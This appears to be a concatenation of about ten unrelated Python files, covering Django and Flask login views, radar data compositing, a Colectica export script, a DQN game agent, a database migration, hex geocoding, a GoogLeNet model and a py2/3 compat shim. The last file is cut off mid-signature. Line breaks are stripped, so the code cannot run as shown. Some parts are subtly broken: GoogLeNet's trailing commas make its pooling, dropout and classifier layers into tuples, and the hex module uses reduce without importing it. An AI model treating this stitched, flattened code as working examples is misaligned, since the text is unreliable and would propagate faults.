from django.conf.urls import url from djoser import views urlpatterns = [ url(r"^token/login/?$", views.TokenCreateView.as_view(), name="login"), url(r"^token/logout/?$", views.TokenDestroyView.as_view(), name="logout"), ]
from ._dummy_data import make_fruit_sold_dummy_association_rules from ._dummy_data import make_dummy_data_classification from ._covid_id import make_covid_id from ._covid_id import get_example_covid_id __all__ = [ "make_fruit_sold_dummy_association_rules", "make_dummy_data_classification", "make_covid_id", "get_example_covid_id", ]
import pytest def test_classic_notebook_templates(jp_serverapp): classic_notebook_templates = [ "notebook.html", "tree.html" ] # Get the server's template environment. template_env = jp_serverapp.web_app.settings.get("notebook_jinja2_env") for name in classic_notebook_templates: template_env.get_template(name) async def test_classic_notebook_asset_URLS(jp_fetch): classic_notebook_paths = [ # Some classic notebook asset paths '/static/notebook/js/main.js', '/static/services/contents.js', # NBclassic asset paths work too. '/static/notebook/notebook/js/main.js', '/static/notebook/services/contents.js', ] for url_path in classic_notebook_paths: r = await jp_fetch(url_path) assert r.code == 200
from flask import Blueprint, request, jsonify, url_for, redirect from flask_login import current_user, login_user, logout_user from project import app, db, google_blueprint from project.api.forms.forms import LoginForm from project.models import User, OAuth from sqlalchemy.orm.exc import NoResultFound from flask_dance.consumer import oauth_authorized, oauth_error from flask_dance.consumer.backend.sqla import OAuthConsumerMixin, SQLAlchemyBackend from flask_dance.contrib.google import make_google_blueprint, google login_blueprint = Blueprint('login', __name__) @google_blueprint.route("/google_login/") def index(): if not current_user.is_authenticated: return redirect(url_for("google.login")) resp = google.get("/oauth2/v2/userinfo") assert resp.ok, resp.text return "You are {email} on Google".format(email=resp.json()["email"]) @oauth_authorized.connect_via(google_blueprint) def google_logged_in(blueprint, token): if not token: # flash("Failed to log in with Google.", category="error") return False resp = blueprint.session.get("/oauth2/v2/userinfo") if not resp.ok: msg = "Failed to fetch user info from Google." # flash(msg, category="error") return False google_info = resp.json() google_user_id = str(google_info["id"]) # Find this OAuth token in the database, or create it query = OAuth.query.filter_by( provider=blueprint.name, provider_user_id=google_user_id, ) try: oauth = query.one() except NoResultFound: oauth = OAuth( provider=blueprint.name, provider_user_id=google_user_id, token=token, ) if oauth.user: login_user(oauth.user) # flash("Successfully signed in with google.") else: # Create a new local user account for this user user = User( # Remember that `email` can be None, if the user declines # to publish their email address on google! email=google_info["email"], given_name=google_info["given_name"], family_name=google_info["family_name"], picture_url=google_info["picture"], gender=google_info["gender"], ) # Associate the new local user account with the OAuth token oauth.user = user # Save and commit our database models db.session.add_all([user, oauth]) db.session.commit() # Log in the new local user account login_user(user) # flash("Successfully signed in with google.") # Disable Flask-Dance's default behavior for saving the OAuth token return False # notify on OAuth provider error @oauth_error.connect_via(google_blueprint) def google_error(blueprint, error, error_description=None, error_uri=None): msg = ( "OAuth error from {name}! " "error={error} description={description} uri={uri}" ).format( name=blueprint.name, error=error, description=error_description, uri=error_uri, ) # flash(msg, category="error") @login_blueprint.route('/login_standard/', methods=['POST']) def login(): """Logs a user in Args: login (str): The user's username or email password (str): The user's non-hashed password Returns: 200 - {'success': 'User <user_id> logged in'} if successful 400 - {'error_field': ['field error1', 'field error2'...]..., } Notes: If the user is logged in, they will be logged out before logging them in to the requested username or email account. """ import time if current_user.is_authenticated: logout_user() form = LoginForm() if form.validate(): user = User.query.filter_by(email=form.email.data).one() login_user(user) response = jsonify({ 'success': 'User {} logged in'.format(user.id) }) response.status_code = 200 return response response = jsonify(form.errors) response.status_code = 400 return response @login_blueprint.route('/logout/') def logout(): """Logs a user out """ logout_user() response = jsonify({ 'success': 'You have successfully logged out' }) response.status_code = 200 return response
# -*- coding: utf-8 -*- # Generated by Django 1.10.7 on 2018-02-23 20:24 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('booking', '0004_booked_service_staff'), ] operations = [ migrations.AlterField( model_name='booked_service', name='staff', field=models.ManyToManyField(related_name='services_assigned', to='customers.Staff'), ), ]
#!/usr/bin/env python # Copyright (c) 2016, wradlib developers. # Distributed under the MIT License. See LICENSE.txt for more info. """ Composition ^^^^^^^^^^^ Combine data from different radar locations on one common set of locations .. autosummary:: :nosignatures: :toctree: generated/ extract_circle togrid compose_ko compose_weighted """ import numpy as np # from scipy.spatial import KDTree # def extract_circle(center, radius, coords): # """ # Extract the indices of coords which fall within a circle # defined by center and radius # # Parameters # ---------- # center : float # radius : float # coords : array of float with shape (numpoints,2) # # Returns # ------- # output : 1-darray of integers # index array referring to the coords array # # """ # print 'Building tree takes:' # t0 = dt.datetime.now() # tree = KDTree(coords) # print dt.datetime.now() - t0 # print 'Query tree takes:' # t0 = dt.datetime.now() # ix = tree.query(center, k=len(coords), distance_upper_bound=radius)[1] # print dt.datetime.now() - t0 # ix = ix[np.where(ix<len(coords))[0]] # return ix def extract_circle(center, radius, coords): """ Extract the indices of coords which fall within a circle defined by center and radius Parameters ---------- center : float radius : float coords : array of float with shape (numpoints,2) Returns ------- output : 1-darray of integers index array referring to the coords array """ return np.where(((coords - center) ** 2).sum(axis=-1) < radius ** 2)[0] def togrid(src, trg, radius, center, data, interpol, *args, **kwargs): """ Interpolate data from a radar location to the composite grid or set of locations Parameters ---------- src : ndarray of float of shape (numpoints, ndim) cartesian x / y coordinates of the radar bins trg : ndarray of float of shape (numpoints, ndim) cartesian x / y coordinates of the composite radius : float the radius of the radar circle (same units as src and trg) center : array of float the location coordinates of the radar data : ndarray of float the data that should be transferred to composite interpol : an interpolation class name from :meth:`wradlib.ipol` e.g. :class:`~wradlib.ipol.Nearest` or :class:`~wradlib.ipol.Idw` Other Parameters ---------------- *args : arguments of Interpolator (see class documentation) Keyword Arguments ----------------- **kwargs : keyword arguments of Interpolator (see class documentation) Returns ------- output : ndarray of float data of the radar circle which is interpolated on the composite grid Examples -------- See :ref:`notebooks/basics/wradlib_workflow.ipynb#Gridding`. """ # get indices to select the subgrid from the composite grid ix = extract_circle(center, radius, trg) # interpolate on subgrid ip = interpol(src, trg[ix], *args, **kwargs) data_on_subgrid = ip(data).reshape((len(ix))) # create container for entire grid composegridshape = [len(trg)] composegridshape.extend(data.shape[1:]) compose_grid = np.repeat(np.nan, len(trg) * np.prod(data.shape[1:])).reshape(composegridshape) # push subgrid results into the large grid compose_grid[ix] = data_on_subgrid return compose_grid def compose_ko(radargrids, qualitygrids): """Composes grids according to quality information using quality \ information as a knockout criterion. The value of the composed pixel is taken from the radargrid whose quality grid has the highest value. Parameters ---------- radargrids : list of arrays radar data to be composited. Each item in the list corresponds to the data of one radar location. All items must have the same shape. qualitygrids : list of arrays quality data to decide upon which radar site will contribute its pixel to the composite. Then length of this list must be the same as that of `radargrids`. All items must have the same shape and be aligned with the items in `radargrids`. Returns ------- composite : array """ # first add a fallback array for all pixels having missing values in all # radargrids radarfallback = (np.repeat(np.nan, np.prod(radargrids[0].shape)) .reshape(radargrids[0].shape)) radargrids.append(radarfallback) radarinfo = np.array(radargrids) # then do the same for the quality grids qualityfallback = (np.repeat(-np.inf, np.prod(radargrids[0].shape)) .reshape(radargrids[0].shape)) qualitygrids.append(qualityfallback) qualityinfo = np.array(qualitygrids) select = np.nanargmax(qualityinfo, axis=0) composite = (radarinfo.reshape((radarinfo.shape[0], -1)) [select.ravel(), np.arange(np.prod(radarinfo.shape[1:]))] .reshape(radarinfo.shape[1:])) radargrids.pop() qualitygrids.pop() return composite def compose_weighted(radargrids, qualitygrids): """Composes grids according to quality information using a weighted \ averaging approach. The value of the composed pixel is the weighted average of all radar pixels with the quality values being the weights. Parameters ---------- radargrids : list of arrays qualitygrids : list of arrays Returns ------- composite : array Examples -------- See :ref:`notebooks/workflow/recipe1.ipynb`. See Also -------- compose_ko : for more description about the shape of the input arrays """ radarinfo = np.array(radargrids) qualityinfo = np.array(qualitygrids) # overall nanmask nanmask = np.all(np.isnan(radarinfo), axis=0) # quality grids must contain values only where radarinfo does qualityinfo[np.isnan(radarinfo)] = np.nan qualityinfo /= np.nansum(qualityinfo, axis=0) composite = np.nansum(radarinfo * qualityinfo, axis=0) composite[nanmask] = np.nan return composite if __name__ == '__main__': print('wradlib: Calling module <comp> as main...')
#!/usr/bin/env python3 """ Python 3 Try to get all questions from an instrument """ import colectica from colectica import ColecticaObject import api import pandas as pd import os import numpy as np import json def from_instrument_get_question_response(C, Agency, ID): """ From an instrument get all questions, all response """ df_instrument_set, instrument_info = C.item_info_set(Agency, ID) df_question = df_instrument_set.loc[(df_instrument_set.ItemType == 'Question') , :] question_df_list = [] codelist_df_list = [] response_df_list = [] for question_id in df_question['Identifier']: # print(question_id) df_question, df_response = C.get_question_all(Agency, question_id) # store DataFrame in list question_df_list.append(df_question) if df_question['response_type'][0] == 'CodeList': codelist_df_list.append(df_response) else: response_df_list.append(df_response) df_question_all = pd.concat(question_df_list) if codelist_df_list == []: df_codelist_all = pd.DataFrame() else: df_codelist_all = pd.concat(codelist_df_list) if response_df_list == []: df_response_all = pd.DataFrame() else: df_response_all = pd.concat(response_df_list) return instrument_info, df_question_all, df_codelist_all, df_response_all def from_instrument_get_statement(C, Agency, ID): """ From an instrument get all Statement """ df_instrument_set, instrument_info = C.item_info_set(Agency, ID) df_statement = df_instrument_set.loc[(df_instrument_set.ItemType == 'Statement') , :] statement_df_list = [] for statement_id in df_statement['Identifier']: dict_statement = C.item_to_dict(Agency, statement_id) df_statement = pd.DataFrame([dict_statement], columns=dict_statement.keys()) statement_df_list.append(df_statement) if not statement_df_list == []: df_statement_all = pd.concat(statement_df_list) else: df_statement_all = pd.DataFrame(columns=['AgencyId', 'Version', 'Identifier', 'URN', 'SourceId', 'Instruction', 'Label', 'Literal']) return df_statement_all def main(): outdir = 'instrument' if not os.path.exists(outdir): os.makedirs(outdir) hostname = None username = None password = None if not hostname: hostname = input ("enter the url of the site: ") if not username: username = input("enter your username: ") if not password: password = input("enter your password: ") C = ColecticaObject(hostname, username, password) # get all instruments # L = C.general_search('f196cc07-9c99-4725-ad55-5b34f479cf7d', '', 0) # print(L['TotalResults']) # 313 # json.dump(L, open(os.path.join(outdir, 'all_instrument.txt'),'w')) L = json.load(open(os.path.join(outdir, 'all_instrument.txt'))) # print(L) all_idx = np.array(range(L['TotalResults'])) # split into 10 chunks chunks = np.array_split(all_idx, 10) this_chunk = 9 for i in chunks[this_chunk]: print(i) Agency = L['Results'][i]['AgencyId'] ID = L['Results'][i]['Identifier'] Version = L['Results'][i]['Version'] instrument_name = '_'.join(' '.join(L['Results'][i]['ItemName'].values()).split(' ')) instrument_dir = os.path.join(outdir, instrument_name) if not os.path.exists(instrument_dir): os.makedirs(instrument_dir) # From an instrument get all questions, all response, print to file instrument_info, df_question_all, df_codelist_all, df_response_all = from_instrument_get_question_response(C, Agency, ID) with open(os.path.join(instrument_dir, 'instrument.txt'), 'w') as f: print(instrument_info, file=f) df_question_all.to_csv(os.path.join(instrument_dir, 'question.csv'), index=False, sep='\t') df_codelist_all.to_csv(os.path.join(instrument_dir, 'codelist.csv'), index=False, sep='\t') df_response_all.to_csv(os.path.join(instrument_dir, 'response.csv'), index=False, sep='\t') # From an instrument get all statements df_statement_all = from_instrument_get_statement(C, Agency, ID) df_statement_out = df_statement_all.loc[:, ['AgencyId', 'Version', 'Identifier', 'URN', 'SourceId', 'Instruction', 'Label', 'Literal']] df_statement_out.to_csv(os.path.join(instrument_dir, 'statement.csv'), index=False, sep='\t') if __name__ == '__main__': main()
import random import gym import numpy as np from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, Flatten, BatchNormalization,Activation from tensorflow.keras.optimizers import Adam from scores.score_logger import ScoreLogger ENV_NAME = "TimePilot-ram-v0" GAMMA = 0.95 LEARNING_RATE = 0.001 MEMORY_SIZE = 1000000 BATCH_SIZE = 20 EXPLORATION_MAX = 1.0 EXPLORATION_MIN = 0.01 EXPLORATION_DECAY = 0.995 NUM_EPISODES=2 WATCH_TRAINING=False class DQNSolver: def __init__(self, observation_input,action_space): self.exploration_rate = EXPLORATION_MAX self.observation_input=observation_input self.action_space = action_space self.memory = [] self.model = Sequential() self.model.add(Dense(24, input_shape=observation_input, activation="relu")) self.model.add(Flatten()) self.model.add(Dense(24, use_bias=False)) self.model.add(BatchNormalization()) self.model.add(Activation("relu")) self.model.add(Dense(action_space, use_bias=False)) self.model.add(BatchNormalization()) self.model.add(Activation("linear")) self.model.compile(loss="mse", optimizer=Adam(lr=LEARNING_RATE)) def predict(self,state): return self.model.predict(state) def remember(self, state, action, reward, next_state, done): self.memory.append((state, action, reward, next_state, done)) def act(self, state): if np.random.rand() < self.exploration_rate: return random.randrange(self.action_space) q_values = self.predict(state)[0] return np.argmax(q_values[0]) def experience_replay(self): if len(self.memory) < BATCH_SIZE: return batch = random.sample(self.memory, BATCH_SIZE) for state, action, reward, state_next, terminal in batch: q_update = reward if not terminal: #new q value for this state/action pair is equal to the reward gained by taking this action at this state, plus the expected reward to be gained for the rest of the game. #GAMMA is a parameter relating to the short/long term planning tendencies of the model. High GAMMA means were planning ahead, low means were looking most at short term rewards. q_update = (reward + GAMMA * np.amax(self.predict(state_next)[0])) q_values = self.predict(state) q_values[0][action] = q_update self.model.fit(state, q_values, verbose=0) self.exploration_rate *= EXPLORATION_DECAY self.exploration_rate = max(EXPLORATION_MIN, self.exploration_rate) def reshape_dims(obs_space): dims=[1] for i in range(len(obs_space.shape)): dims.append(obs_space.shape[i]) return dims def find_input_shape(env): input_shape=None #Box if(type(env.observation_space)==gym.spaces.box.Box): input_shape=env.observation_space.shape #Discrete elif(type(env.observation_space)==gym.spaces.discrete.Discrete): input_shape=[env.observation_space.n] return input_shape class ActionSpaceError(Exception): pass def training(): env = gym.make(ENV_NAME) # If the user chooses an environment with a non-discrete action space, return an error because DQN only works with discrete action spaces if(type(env.action_space)!=gym.spaces.discrete.Discrete): raise ActionSpaceError('This environment uses an action space that is not discrete. DQN can only be trained using discrete action spaces. Please select an envionment with a discrete action space.') act_space=env.action_space.n score_logger = ScoreLogger(ENV_NAME) observation_input=find_input_shape(env) dims=reshape_dims(env.observation_space) dqn_solver = DQNSolver(observation_input,act_space) for i in range(NUM_EPISODES): state = env.reset() #reshape state array if it has more than one dimension if(len(dims)>1): state = state.reshape(dims) step = 0 while True: step += 1 if(WATCH_TRAINING): env.render() action = dqn_solver.act(state) state_next, reward, terminal, info = env.step(action) reward = reward if not terminal else -reward #reshape state array if it has more than one dimension if(len(dims)>1): state_next = state_next.reshape(dims) dqn_solver.remember(state, action, reward, state_next, terminal) state = state_next if terminal: print("Run: " + str(i+1) + ", exploration: " + str(dqn_solver.exploration_rate) + ", score: " + str(step)) score_logger.add_score(step, i+1) break dqn_solver.experience_replay() return dqn_solver def testing(dqn_solver): env=gym.make(ENV_NAME) dims=reshape_dims(env.observation_space) step=0 #set exploration rate to be 0 so that we just follow the q function's policy dqn_solver.exploration_rate=0 state=env.reset() #reshape state array if it has more than one dimension if(len(dims)>1): state = state.reshape(dims) while True: step+=1 env.render() action=dqn_solver.act(state) next_state,reward,terminal,info=env.step(action) if(terminal): break #reshape state array if it has more than one dimension if(len(dims)>1): state = next_state.reshape(dims) if __name__ == "__main__": solution=training() testing(solution)
""" Added public field to the report table Revision ID: 1fb575f848af Revises: 492fe78451c6 Create Date: 2014-02-28 02:14:43.655893 """ # revision identifiers, used by Alembic. revision = '1fb575f848af' down_revision = '492fe78451c6' from alembic import op import sqlalchemy as sa def upgrade(): ### commands auto generated by Alembic - please adjust! ### op.add_column('report', sa.Column('public', sa.Boolean(), nullable=True)) ### end Alembic commands ### def downgrade(): ### commands auto generated by Alembic - please adjust! ### op.drop_column('report', 'public') ### end Alembic commands ###
# coding: utf-8 from .projection import * import math __all__ = ["create_zone", "create_zone_by_code", "meter2hex", "hex2deg", "hex2meter", "deg2hex", "encode", "decode", "create_zones_by_extent"] HEX_KEY = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" WKB_TMPL = "POLYGON(({0} {1}, {2} {3}, {4} {5}, {6} {7}, {8} {9}, {10} {11}, {0} {1}))" class Zone(object): """Hex Zone""" def __init__(self, level, hex_x_no, hex_y_no): self._code = encode(level, hex_x_no, hex_y_no) self._hex_x_no = hex_x_no self._hex_y_no = hex_y_no self._level = level self._x, self._y = hex2meter(self._level, self._hex_x_no, self._hex_y_no) self._lon, self._lat = meter2deg(self._x, self._y) @property def code(self): return self._code @property def hex_x_no(self): return self._hex_x_no @property def hex_y_no(self): return self._hex_y_no @property def level(self): return self._level def get_parent(self): return create_zone_by_code(self._code[:-1]) def get_children(self): return [create_zone_by_code(self._code + c) for c in "012345678"] def get_movable_zones(self, distance): result = [] for delta_y in range(-distance, distance + 1): minx = -distance + delta_y if delta_y > 0 else -distance maxx = distance + delta_y if delta_y < 0 else distance for delta_x in range(minx, maxx + 1): if delta_x == delta_y == 0: continue result.append(Zone(self._level, self._hex_x_no + delta_x, self._hex_y_no + delta_y)) return result def __eq__(self, other): return other.code == self._code def __hash__(self): return hash(self._code) def get_distance(self, other): if self._level != other.level: raise Exception("Level must be same") delta_x = self._hex_x_no - other.hex_x_no delta_y = self._hex_y_no - other.hex_y_no abs_delta_x = abs(delta_x) abs_delta_y = abs(delta_y) if delta_x * delta_y > 0: return abs_delta_x if abs_delta_x > abs_delta_y else abs_delta_y return abs_delta_x + abs_delta_y def get_vertices(self): h_len = HEX_LEN / math.pow(3, self._level) half_h_len = h_len / 2 h_height = half_h_len * math.sqrt(3) self._x, self._y = hex2meter(self._level, self._hex_x_no, self._hex_y_no) h_top = self._y + h_height h_btm = self._y - h_height h_l = self._x - h_len h_r = self._x + h_len h_cl = self._x - half_h_len h_cr = self._x + half_h_len return ((h_l, self._y), (h_cl, h_top), (h_cr, h_top), (h_r, self._y), (h_cr, h_btm), (h_cl, h_btm)) def get_vertices_deg(self): return tuple(meter2deg(m[0], m[1]) for m in self.get_vertices()) def get_wkt(self): return WKB_TMPL.format(*reduce(lambda a, b: a+b, self.get_vertices())) def get_wkt_deg(self): return WKB_TMPL.format(*reduce(lambda a, b: a+b, self.get_vertices_deg())) def create_zone(level, lon, lat): return Zone(level, *deg2hex(level, lon, lat)) def create_zone_by_code(hexcode): return Zone(*decode(hexcode)) def deg2hex(level, lon, lat): """degree to hex xy""" x, y = deg2meter(lon, lat) return meter2hex(level, x, y) def meter2hex(level, x, y): """meter to hex xy""" h_len = HEX_LEN / math.pow(3, level) hy = y - (1 / math.sqrt(3)) * x hx = y + (1 / math.sqrt(3)) * x # h_base = 3 * h_len / sqrt(3) h_base = h_len * math.sqrt(3) hex_x_coord = hx / h_base hex_y_coord = hy / h_base hex_x_coord_org = math.floor(hex_x_coord) hex_y_coord_org = math.floor(hex_y_coord) hex_x_no = round(hex_x_coord) hex_y_no = round(hex_y_coord) #Y > -X + hex_x_coord_org + hex_y_coord_org + 1 if hex_y_coord >= -hex_x_coord + hex_x_coord_org + hex_y_coord_org + 1: #Y > 0.5X + hex_y_coord_org - 0.5hex_x_coord_org #Y < 2X - 2hex_x_coord_org + hex_y_coord_org if 0.5 * hex_x_coord - 0.5 * hex_x_coord_org + hex_y_coord_org < hex_y_coord \ < 2.0 * hex_x_coord - 2.0 * hex_x_coord_org + hex_y_coord_org: hex_x_no = hex_x_coord_org + 1 hex_y_no = hex_y_coord_org + 1 #Y < -X + hex_x_coord_org + hex_y_coord_org + 1 elif hex_y_coord < -hex_x_coord + hex_x_coord_org + hex_y_coord_org + 1: #Y > 2X - 2hex_x_coord_org + hex_y_coord_org - 1 #Y < 0.5X - 0.5hex_x_coord_org + hex_y_coord_org + 0.5 if 2.0 * hex_x_coord - 2.0 * hex_x_coord_org + hex_y_coord_org - 1 < hex_y_coord \ < 0.5 * hex_x_coord - 0.5 * hex_x_coord_org + hex_y_coord_org + 0.5: hex_x_no = hex_x_coord_org hex_y_no = hex_y_coord_org x = (hex_x_no * h_base - hex_y_no * h_base) * (math.sqrt(3) / 2) if HALF_EL - x < h_len / 2: tmp_x_no = hex_x_no hex_x_no = hex_y_no hex_y_no = tmp_x_no return int(hex_x_no), int(hex_y_no) def hex2deg(level, hex_x, hex_y): """hex xy to degree""" return meter2deg(*hex2meter(level, hex_x, hex_y)) def hex2meter(level, hex_x, hex_y): """hex xy to meter""" h_len = HEX_LEN / math.pow(3, level) y = (hex_x + hex_y) * h_len * math.sqrt(3) / 2.0 x = (hex_x - hex_y) * h_len * 3.0 / 2.0 return x, y def encode(level, hex_x_no, hex_y_no): """encode hex xy to hexcode""" codes = [] for i in range(-2, level + 1, 1): base = math.pow(3, level - i) boundary = math.ceil(base / 2) code = 0 if hex_x_no <= -boundary: hex_x_no += base elif hex_x_no >= boundary: code += 6 hex_x_no -= base else: code += 3 if hex_y_no <= -boundary: hex_y_no += base elif hex_y_no >= boundary: code += 2 hex_y_no -= base else: code += 1 codes.append(str(code)) head_code = int("".join(codes[:3])) quotient = head_code // 30 remainder = head_code % 30 head_code_hex = HEX_KEY[quotient] + HEX_KEY[remainder] return head_code_hex + "".join(codes[3:]) def decode(code): """hexcode to hex xy""" level = len(code) - 2 quotient = HEX_KEY.index(code[0]) remainder = HEX_KEY.index(code[1]) head_code = "{0:03}".format(quotient * 30 + remainder) base_code = head_code + code[2:] hex_x_no = 0 hex_y_no = 0 for i, c in enumerate(base_code): x = int(c) // 3 y = int(c) % 3 base = math.pow(3, level + 2 - i) if x == 0: hex_x_no -= base elif x == 2: hex_x_no += base if y == 0: hex_y_no -= base elif y == 2: hex_y_no += base return level, int(hex_x_no), int(hex_y_no) def create_zones_by_extent(level, minx, miny, maxx, maxy): """ """ ll_zone = create_zone(level, minx, miny) lr_zone = create_zone(level, maxx, miny) ul_zone = create_zone(level, minx, maxy) ur_zone = create_zone(level, maxx, maxy) #if ll_zone.hex_x_no + ll_zone.hex_y_no > lr_zone.hex_x_no + lr_zone.hex_y_no: # lr_zone = Zone(level, lr_zone.hex_x_no + 1, lr_zone.hex_y_no) #elif ll_zone.hex_x_no + ll_zone.hex_y_no < lr_zone.hex_x_no + lr_zone.hex_y_no: # lr_zone = Zone(level, lr_zone.hex_x_no , lr_zone.hex_y_no -1) #if ul_zone.hex_x_no + ul_zone.hex_y_no < ur_zone.hex_x_no + ur_zone.hex_y_no: # ur_zone = Zone(level, ur_zone.hex_x_no + 1, ur_zone.hex_y_no) #elif ul_zone.hex_x_no + ul_zone.hex_y_no < ur_zone.hex_x_no + ur_zone.hex_y_no: # ur_zone = Zone(level, ur_zone.hex_x_no , ur_zone.hex_y_no -1) to_remove = set() to_remove.add(Zone(level, ll_zone.hex_x_no - 1, ll_zone.hex_y_no)) to_remove.add(Zone(level, lr_zone.hex_x_no, lr_zone.hex_y_no - 1)) to_remove.add(Zone(level, ul_zone.hex_x_no, ul_zone.hex_y_no + 1)) to_remove.add(Zone(level, ur_zone.hex_x_no + 1, ur_zone.hex_y_no)) result = set() width = lr_zone.get_distance(ll_zone) height = ul_zone.get_distance(ll_zone) for i in range(0, width // 2 + 1): base1 = Zone(level, ll_zone.hex_x_no + i, ll_zone.hex_y_no - i) #result.append(base1) for j in range(0, height + 1): result.add(Zone(level, base1.hex_x_no + j, base1.hex_y_no + j)) if base1.code != lr_zone.code: ##base2 = Zone(level, base1.hex_x_no, base1.hex_y_no -1) base2 = Zone(level, base1.hex_x_no + 1, base1.hex_y_no) #result.append(base2) ##for k in range(0, height + 2): ## result.append(Zone(level, base2.hex_x_no + k, base2.hex_y_no + k)) for k in range(0, height ): result.add(Zone(level, base2.hex_x_no + k, base2.hex_y_no + k)) if ll_zone.get_vertices_deg()[0][1] > miny: for i in range(0, width // 2 + 1): result.add(Zone(level, ll_zone.hex_x_no + i, ll_zone.hex_y_no - 1 -i)) if ul_zone.get_vertices_deg()[0][1] < maxy: for i in range(0, width // 2 + 1): result.add(Zone(level, ul_zone.hex_x_no + 1 + i, ul_zone.hex_y_no - i)) if ll_zone.get_vertices_deg()[1][0] > minx: for i in range(0, height): result.add(Zone(level, ll_zone.hex_x_no + i, ll_zone.hex_y_no + 1 + i)) if lr_zone.get_vertices_deg()[2][0] < maxx: for i in range(0, height): result.add(Zone(level, lr_zone.hex_x_no + 1 + i, lr_zone.hex_y_no + i)) return result - to_remove
import warnings from collections import namedtuple from typing import Optional, Tuple, List, Callable, Any import torch import torch.nn as nn import torch.nn.functional as F from torch import Tensor class BasicConv2d(nn.Module): def __init__(self, in_channels: int, out_channels: int, kernel_size, stride=1, **kwargs: Any) -> None: super().__init__() self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, **kwargs) self.bn = nn.BatchNorm2d(out_channels, eps=0.001) def forward(self, x: Tensor) -> Tensor: x = self.conv(x) x = self.bn(x) return F.relu(x, inplace=True) class Inception(nn.Module): def __init__( self, in_channels: int, ch1x1: int, ch3x3red: int, ch3x3: int, ch5x5red: int, ch5x5: int, pool_proj: int, ) -> None: super().__init__() self.branch1 = BasicConv2d(in_channels, ch1x1, kernel_size=1) self.branch2 = nn.Sequential( BasicConv2d(in_channels, ch3x3red, kernel_size=1), BasicConv2d(ch3x3red, ch3x3, kernel_size=3, padding=1) ) self.branch3 = nn.Sequential( BasicConv2d(in_channels, ch5x5red, kernel_size=1), BasicConv2d(ch5x5red, ch5x5, kernel_size=3, padding=1), ) self.branch4 = nn.Sequential( nn.MaxPool2d(kernel_size=3, stride=1, padding=1, ceil_mode=True), BasicConv2d(in_channels, pool_proj, kernel_size=1), ) def forward(self, x: Tensor) -> Tensor: branch1 = self.branch1(x) branch2 = self.branch2(x) branch3 = self.branch3(x) branch4 = self.branch4(x) return torch.cat([branch1, branch2, branch3, branch4], 1) class GoogLeNet(nn.Module): def __init__(self, num_classes: int = 1000, dropout: float = 0.5, ) -> None: super().__init__() self.features = [ BasicConv2d(3, 64, kernel_size=7, stride=2, padding=3), # N x 64 x 112 x 112 nn.MaxPool2d(3, stride=2, ceil_mode=True), # N x 64 x 56 x 56 BasicConv2d(64, 64, kernel_size=1), # N x 64 x 56 x 56 BasicConv2d(64, 192, kernel_size=3, padding=1), # N x 192 x 56 x 56 nn.MaxPool2d(3, stride=2, ceil_mode=True), # N x 192 x 56 x 56 Inception(192, 64, 96, 128, 16, 32, 32), # N x 256 x 28 x 28 Inception(256, 128, 128, 192, 32, 96, 64), # N x 480 x 28 x 28 nn.MaxPool2d(3, stride=2, ceil_mode=True), # N x 480 x 14 x 14 Inception(480, 192, 96, 208, 16, 48, 64), # N x 512 x 14 x 14 Inception(512, 160, 112, 224, 24, 64, 64), # N x 512 x 14 x 14 Inception(512, 128, 128, 256, 24, 64, 64), # N x 512 x 14 x 14 Inception(512, 112, 144, 288, 32, 64, 64), # N x 528 x 14 x 14 Inception(528, 256, 160, 320, 32, 128, 128), # N x 832 x 14 x 14 nn.MaxPool2d(2, stride=2, ceil_mode=True), # N x 832 x 7 x 7 Inception(832, 256, 160, 320, 32, 128, 128), # N x 1024 x 7 x 7 Inception(832, 384, 192, 384, 48, 128, 128), # N x 1024 x 7 x 7 ] self.features_out = [ 64, 64, 64, 192, 192, 256, 480, 480, 512, 512, 512, 528, 832, 832, 1024, 1024 ] self.model = nn.Sequential(*self.features) self.avgpool = nn.AdaptiveAvgPool2d((1, 1)), self.dropout = nn.Dropout(dropout), self.fc = nn.Linear(1024, num_classes), def forward(self, x: Tensor): x = self.model(x) x = self.avgpool(x) x = torch.flatten(x, 1) x = self.dropout(x) x = self.fc(x) return x
"""Python 2/3 compat layer.""" from __future__ import print_function, division, absolute_import try: basestring except NameError: basestring = str try: unicode except NameError: unicode = str try: unichr bytechr = chr byteord = ord except: unichr = chr def bytechr(n): return bytes([n]) def byteord(c): return c if isinstance(c, int) else ord(c) try: from StringIO import StringIO except ImportError: from io import BytesIO as StringIO def strjoin(iterable, joiner=''): return tostr(joiner).join(iterable) def tobytes(s, encoding='ascii', errors='strict'): if not isinstance(s, bytes): return s.encode(encoding, errors) else: return s def tounicode(s, encoding='ascii', errors='strict'): if not isinstance(s, unicode): return s.decode(encoding, errors) else: return s if str == bytes: class Tag(str): def tobytes(self): if isinstance(self, bytes): return self else: return self.encode('latin1') tostr = tobytes bytesjoin = strjoin else: class Tag(str): @staticmethod def transcode(blob): if not isinstance(blob, str): blob = blob.decode('latin-1') return blob def __new__(self, content): return str.__new__(self, self.transcode(content)) def __ne__(self, other): return not self.__eq__(other) def __eq__(self, other): return str.__eq__(self, self.transcode(other)) def __hash__(self): return str.__hash__(self) def tobytes(self): return self.encode('latin-1') tostr = tounicode def bytesjoin(iterable, joiner=b''): return tobytes(joiner).join(tobytes(item) for item in iterable)
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= r'''Backend of embedding tables. ''' from __future__ import absolute_import from __future__ import division from __future__ import print_function import abc from tensorflow.python.saved_model.model_utils import mode_keys from hybridbackend.tensorflow.framework.context import Context class EmbeddingBackend(object): # pylint: disable=useless-object-inheritance r'''Backend for embedding columns. An embedding backend manages underlying storage for embedding columns. Data scientists can extend this class for customized implementation of embedding weights. ''' _registry = {} @classmethod def register(cls, impl): r'''Register implementation. Args: impl: Implementation to register. ''' cls._registry[impl.NAME] = impl @classmethod def get(cls): r'''Get an instance of registered implementation. Returns: An instance of registered implementation. ''' backend = Context.get().options.emb_backend if backend not in cls._registry: raise ValueError(f'emb_backend is invalid: {backend}') return cls._registry[backend] @abc.abstractmethod def build( self, column, name, shape, dtype=None, trainable=True, use_resource=True, initializer=None, 